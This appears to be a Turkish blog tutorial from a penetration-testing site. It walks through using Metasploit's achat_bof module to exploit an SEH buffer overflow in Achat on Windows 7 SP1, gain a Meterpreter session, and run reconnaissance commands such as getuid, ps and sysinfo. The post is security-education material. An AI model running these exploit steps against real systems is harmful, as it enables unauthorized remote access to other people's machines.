MSF achat_bof İstismar Modülü ile Uygulama Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows 7 SP1 işletim sisteminde Achat uygulamasına ait zafiyetinin Metasploit Framework ile istismar edilecek ve kullanıcı hakları ile Meterpreter bağlantısı elde edilecektir.

Achat uygulaması, anlık mesajlaşma ve veri transferi amaçları ile kullanılan bir uygulamadır. Bu uygulamadaki SEH tabanlı bellek taşması zafiyeti MSF achat_bof expoit modülü ile kötüye kullanılarak işletim sistemine Meterpreter bağlantısı elde edilebilir.

Metasploit üzerinde ilgili modülün seçenekleri aşağıdaki gibidir:

search achat
use exploit/windows/misc/achat_bof
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-01

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir.

set RHOST 192.168.100.120
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-02

Seçenekler ayarlandıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında uygulamayı çalıştıran kullanıcı haklarıyla Meterpreter bağlantısının elde edildiği görülmektedir.

exploit
getuid
getpid
ps -u Zeynep
sysinfo

acquiring-meterpreter-shell-on-windows-by-using-msf-achat-bof-exploit-module-03

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.